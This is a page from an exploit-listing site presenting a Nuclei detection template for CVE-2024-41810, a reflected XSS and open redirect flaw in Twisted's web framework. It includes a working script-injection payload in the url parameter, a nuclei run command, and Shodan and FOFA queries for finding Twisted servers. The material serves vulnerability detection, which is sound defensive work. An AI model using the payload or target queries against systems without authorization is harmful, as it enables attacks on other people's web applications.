Materialized exploit
CVE-2024-41810
MEDIUM1 public exploit(s) for this CVE, 1 materialized with their code.
For defensive research only. Only test on systems you own or have written authorization for. Unauthorized access is illegal.
Nuclei
medium Verified
Source
Twisted - Open Redirect & XSS
By projectdiscovery
How to test this exploit
The Nuclei template IS the test: an executable detection rule. Install nuclei, then run it against a target you control.
nuclei -id CVE-2024-41810 -u https://your-target
Template yaml
id: CVE-2024-41810
info:
name: Twisted - Open Redirect & XSS
author: KoYejune0302,cheoljun99,sim4110,gy741
severity: medium
description: |
Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. This template tests for an open redirect and XSS vulnerability in the URL parameter. This vulnerability is fixed in 24.7.0rc1.
impact: |
Attackers can exploit open redirect and reflected XSS via the redirect URL parameter in the Twisted web framework.
remediation: |
Update Twisted to version 24.7.0rc1 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-41810
epss-score: 0.01176
epss-percentile: 0.65368
cpe: cpe:2.3:a:twistedmatrix:twisted:*:*:*:*:*:*:*:*
reference:
- https://github.com/advisories/GHSA-cf56-g6w6-pqq2
- https://nvd.nist.gov/vuln/detail/CVE-2024-41810
metadata:
max-request: 2
shodan-query: html:'Twisted' html:"python"
fofa-query: body="twisted" && "python"
tags: xss,redirect,twisted,python,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: response
words:
- "TWISTED_SESSION"
- '["Twisted'
internal: true
- method: GET
path:
- '{{BaseURL}}?url=ws://example.com/"><script>alert(document.domain)</script>'
redirects: true
matchers-condition: and
matchers:
- type: word
part: response
words:
- 'Location: ws://example.com/"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 302
# digest: 4a0a00473045022100c2ebf2dea5f51bc9e2caf872bb10bee75e51af77cda3be3168ac517996e4869a02201b89d1f1bdf482bd81f16b5551996e96d0f7eca3b6e307d7e467bfecabc80fea:922c64590222798bb761d5b6d8e72950